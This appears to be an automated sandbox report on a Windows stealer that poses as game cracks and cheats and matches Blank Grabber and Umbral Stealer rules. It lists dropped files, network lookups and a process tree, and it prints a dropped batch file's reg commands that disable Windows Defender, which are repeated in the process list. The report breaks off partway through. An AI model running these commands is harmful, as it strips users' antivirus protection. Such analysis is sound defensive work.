                                                  SHA-256:2952FA4AB9BC3E2B04B1F3AB6B648D0D23FA74856C50BF21FB13FDDFE9A874BB
                                                  SHA-512:CACEEC284B71DF124D47267E5CA42BF84E558AA9606B0186F132FBA8D2BEAD2DDBD9304CD82761270B6C42271E0937AEFF605EF5D865C424CC29B39CA05B123A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                  Joe Sandbox View:
                                                  • Filename: FixTsDfhiC.exe, Detection: malicious, Browse
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*......................x.....l.q......0....@...........................v..................@......................O...t.t......pv.P7....................................................n.......................r.x...........................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.vmp0...............................`..`.vmp1...0...........................`..`.rsrc...P7...pv..8..................@..P.............................................................................................................$..............@..P........................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Primordial Crack.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\wKj1CBkbos.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):13317632
                                                  Entropy (8bit):7.99074200508439
                                                  Encrypted:true
                                                  SSDEEP:393216:2JlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8X:2bQpgssCKInwjJaMc
                                                  MD5:BBD6FFDB33259778F08704696A04891F
                                                  SHA1:0FD836BB4BFC035FF35EBE0FB47E4693CEC9E8BA
                                                  SHA-256:841EB644979B3C640761762645C9CD26F9BB46E558EAEB7BF0C2A79E761878F4
                                                  SHA-512:1B66F11B3A3DEA1E6A8F4F7EE493437A41E30704D1C80048EFD245184A447FDE6ABF06FE45AF0663A72B30B657A7297554DF8C3AF7B36AE2E0DF21A5031A34E0
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................. .......0....@..............................................@...........................P..........X....................................................p......................................................CODE................................ ..`DATA....|....0......................@...BSS..........@...........................idata.......P......................@....tls.........`...........................rdata.......p......................@..P.reloc............... ..............@..P.rsrc...X............"..............@..P.....................$..............@..P........................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\windows defender.bat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\wKj1CBkbos.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3135
                                                  Entropy (8bit):5.017771879220886
                                                  Encrypted:false
                                                  SSDEEP:96:5UKNozkU9yryxh2VokttSTKlAHlRFH4rPNJLoJ:bD0
                                                  MD5:4C35B71D2D89C8E8EB773854085C56EA
                                                  SHA1:EDE16731E61348432C85EF13DF4BEB2BE8096D9B
                                                  SHA-256:3EFEEAAABFD33FF95934BEE4D6D84E4ECB158D1E7777F6EECD26B2746991ED42
                                                  SHA-512:A6CCBB2913738CA171686A2DD70E96330B0972DADB64F7294AC2B4C9BB430C872ED2BCD360F778962162B9E3BE305836FA7F6762B46310C0AD4D6EF0C1CDAC8D
                                                  Malicious:true
                                                  Preview:reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f.reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protecti

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.983955645619261
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:wKj1CBkbos.exe
                                                  File size:13'565'952 bytes
                                                  MD5:e3a480a53d8b2c398a7642e1f4e84785
                                                  SHA1:7f8fa5e3dc9be9055f9202213be33460a1af1e09
                                                  SHA256:11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2
                                                  SHA512:b3fce5ac73b75fb70d6c798517426ee614b72f24236baf07752f1289a8ce78d74c3c1ec5168f1d8fbcaa5b7de072ef3175f895ac1a49379f716209df49d103e8
                                                  SSDEEP:393216:oJlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8t:obQpgssCKInwjJaMu
                                                  TLSH:32D6336731695346D0EEC77AC533BE8372F29F6B8980E5BD1889B9C41A36B81D507B03
                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                  File Icon

                                                  Icon Hash:00928e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4020cc
                                                  Entrypoint Section:CODE
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                  DLL Characteristics:
                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:d59a4a699610169663a929d37c90be43

                                                  Entrypoint Preview

                                                  Instruction
                                                  push ebp
                                                  mov ebp, esp
                                                  mov ecx, 0000000Ch
                                                  push 00000000h
                                                  push 00000000h
                                                  dec ecx
                                                  jne 00007F8F9CB7442Bh
                                                  push ecx
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov eax, 0040209Ch
                                                  call 00007F8F9CB73EA0h
                                                  xor eax, eax
                                                  push ebp
                                                  push 00402361h
                                                  push dword ptr fs:[eax]
                                                  mov dword ptr fs:[eax], esp
                                                  lea edx, dword ptr [ebp-14h]
                                                  mov eax, 00402378h
                                                  call 00007F8F9CB74279h
                                                  mov eax, dword ptr [ebp-14h]
                                                  call 00007F8F9CB74349h
                                                  mov edi, eax
                                                  test edi, edi
                                                  jng 00007F8F9CB74666h
                                                  mov ebx, 00000001h
                                                  lea edx, dword ptr [ebp-20h]
                                                  mov eax, ebx
                                                  call 00007F8F9CB74308h
                                                  mov ecx, dword ptr [ebp-20h]
                                                  lea eax, dword ptr [ebp-1Ch]
                                                  mov edx, 00402384h
                                                  call 00007F8F9CB73A98h
                                                  mov eax, dword ptr [ebp-1Ch]
                                                  lea edx, dword ptr [ebp-18h]
                                                  call 00007F8F9CB7423Dh
                                                  mov edx, dword ptr [ebp-18h]
                                                  mov eax, 00404680h
                                                  call 00007F8F9CB73970h
                                                  lea edx, dword ptr [ebp-2Ch]
                                                  mov eax, ebx
                                                  call 00007F8F9CB742D6h
                                                  mov ecx, dword ptr [ebp-2Ch]
                                                  lea eax, dword ptr [ebp-28h]
                                                  mov edx, 00402390h
                                                  call 00007F8F9CB73A66h
                                                  mov eax, dword ptr [ebp-28h]
                                                  lea edx, dword ptr [ebp-24h]
                                                  call 00007F8F9CB7420Bh
                                                  mov edx, dword ptr [ebp-24h]
                                                  mov eax, 00404684h
                                                  call 00007F8F9CB7393Eh
                                                  lea edx, dword ptr [ebp-38h]
                                                  mov eax, ebx
                                                  call 00007F8F9CB742A4h
                                                  mov ecx, dword ptr [ebp-38h]
                                                  lea eax, dword ptr [ebp-34h]
                                                  mov edx, 0040239Ch

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x50000x302.idata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000xcedc4c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x1c8.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x70000x18.rdata
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  CODE0x10000x13b80x1400e5913936857bed3b3b2fbac53e973471False0.6318359375data6.340990548290613IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  DATA0x30000x7c0x200cef89de607e490725490a3cd679af6bbFalse0.162109375Matlab v4 mat-file (little endian) , numeric, rows 0, columns 42304001.1176271682252383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  BSS0x40000x6950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .idata0x50000x3020x4003d2f2fc4e279cba623217ec9de264c4fFalse0.3876953125data3.47731642923935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .tls0x60000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rdata0x70000x180x200467f29e48f3451df774e13adae5aafc2False0.05078125data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                  .reloc0x80000x1c80x2009859d413c7408cb699cca05d648c2502False0.876953125data5.7832974211095225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                  .rsrc0x90000xcedc4c0xcede00b71b638293214e43c1f14a9a85e81aa0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_RCDATA0x936c0x39600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3982545275054466
                                                  RT_RCDATA0x4296c0xcb3600PE32 executable (GUI) Intel 80386, for MS Windows0.9421873092651367
                                                  RT_RCDATA0xcf5f6c0xc3fASCII text0.19138755980861244
                                                  RT_RCDATA0xcf6bac0x13ASCII text, with no line terminators1.4210526315789473
                                                  RT_RCDATA0xcf6bc00x14ASCII text, with no line terminators1.4
                                                  RT_RCDATA0xcf6bd40x14ASCII text, with no line terminators1.4
                                                  RT_RCDATA0xcf6be80x1very short file (no magic)9.0
                                                  RT_RCDATA0xcf6bec0x1very short file (no magic)9.0
                                                  RT_RCDATA0xcf6bf00x1very short file (no magic)9.0
                                                  RT_RCDATA0xcf6bf40x1very short file (no magic)9.0
                                                  RT_RCDATA0xcf6bf80x1very short file (no magic)9.0
                                                  RT_RCDATA0xcf6bfc0x1very short file (no magic)9.0
                                                  RT_RCDATA0xcf6c000x10data1.5
                                                  RT_RCDATA0xcf6c100x1very short file (no magic)9.0
                                                  RT_RCDATA0xcf6c140x38data1.0714285714285714

                                                  Imports

                                                  DLLImport
                                                  kernel32.dllGetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                                  kernel32.dllWriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                                  shfolder.dllSHGetFolderPathA
                                                  shell32.dllShellExecuteA

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 30, 2024 12:37:08.499875069 CET4971180192.168.2.6208.95.112.1
                                                  Oct 30, 2024 12:37:08.505393028 CET8049711208.95.112.1192.168.2.6
                                                  Oct 30, 2024 12:37:08.505465031 CET4971180192.168.2.6208.95.112.1
                                                  Oct 30, 2024 12:37:08.505666971 CET4971180192.168.2.6208.95.112.1
                                                  Oct 30, 2024 12:37:08.511208057 CET8049711208.95.112.1192.168.2.6
                                                  Oct 30, 2024 12:37:09.099817991 CET8049711208.95.112.1192.168.2.6
                                                  Oct 30, 2024 12:37:09.110732079 CET4971180192.168.2.6208.95.112.1
                                                  Oct 30, 2024 12:37:18.923015118 CET4975880192.168.2.6208.95.112.1
                                                  Oct 30, 2024 12:37:18.928286076 CET8049758208.95.112.1192.168.2.6
                                                  Oct 30, 2024 12:37:18.928375006 CET4975880192.168.2.6208.95.112.1
                                                  Oct 30, 2024 12:37:18.928519011 CET4975880192.168.2.6208.95.112.1
                                                  Oct 30, 2024 12:37:18.933789015 CET8049758208.95.112.1192.168.2.6
                                                  Oct 30, 2024 12:37:19.535264969 CET8049758208.95.112.1192.168.2.6
                                                  Oct 30, 2024 12:37:19.536235094 CET4975880192.168.2.6208.95.112.1

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 30, 2024 12:37:08.473795891 CET6071853192.168.2.61.1.1.1
                                                  Oct 30, 2024 12:37:08.481379986 CET53607181.1.1.1192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 30, 2024 12:37:08.473795891 CET192.168.2.61.1.1.10xf608Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 30, 2024 12:37:08.481379986 CET1.1.1.1192.168.2.60xf608No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                  Oct 30, 2024 12:37:18.196654081 CET1.1.1.1192.168.2.60xc482No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 30, 2024 12:37:18.196654081 CET1.1.1.1192.168.2.60xc482No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                  Oct 30, 2024 12:37:20.182543993 CET1.1.1.1192.168.2.60xe427No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                  Oct 30, 2024 12:37:20.182543993 CET1.1.1.1192.168.2.60xe427No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • ip-api.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.649711208.95.112.1804420C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 30, 2024 12:37:08.505666971 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Oct 30, 2024 12:37:09.099817991 CET174INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 11:37:08 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 5
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 74 72 75 65 0a
                                                  Data Ascii: true


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192.168.2.649758208.95.112.180
                                                  TimestampBytes transferredDirectionData
                                                  Oct 30, 2024 12:37:18.928519011 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Oct 30, 2024 12:37:19.535264969 CET174INHTTP/1.1 200 OK
                                                  Date: Wed, 30 Oct 2024 11:37:18 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 5
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 74 72 75 65 0a
                                                  Data Ascii: true


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:07:37:01
                                                  Start date:30/10/2024
                                                  Path:C:\Users\user\Desktop\wKj1CBkbos.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\wKj1CBkbos.exe"
                                                  Imagebase:0x400000
                                                  File size:13'565'952 bytes
                                                  MD5 hash:E3A480A53D8B2C398A7642E1F4E84785
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:07:37:02
                                                  Start date:30/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
                                                  Imagebase:0x1bc02440000
                                                  File size:235'008 bytes
                                                  MD5 hash:06129FFC46E854930CFCAA754CA1D487
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 84%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:07:37:02
                                                  Start date:30/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Primordial Crack.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Primordial Crack.exe"
                                                  Imagebase:0x400000
                                                  File size:13'317'632 bytes
                                                  MD5 hash:BBD6FFDB33259778F08704696A04891F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 92%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:07:37:05
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"wmic.exe" csproduct get uuid
                                                  Imagebase:0x7ff6da950000
                                                  File size:576'000 bytes
                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:07:37:05
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:07:37:05
                                                  Start date:30/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
                                                  Imagebase:0x400000
                                                  File size:13'304'832 bytes
                                                  MD5 hash:7DB5128F7A81CC1AF094D8898E79FF21
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 75%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:07:37:06
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:07:37:06
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:07:37:07
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:07:37:07
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:07:37:07
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:13
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:14
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:07:37:08
                                                  Start date:30/10/2024
                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                  Imagebase:0x780000
                                                  File size:59'392 bytes
                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                  Has elevated privileges:true
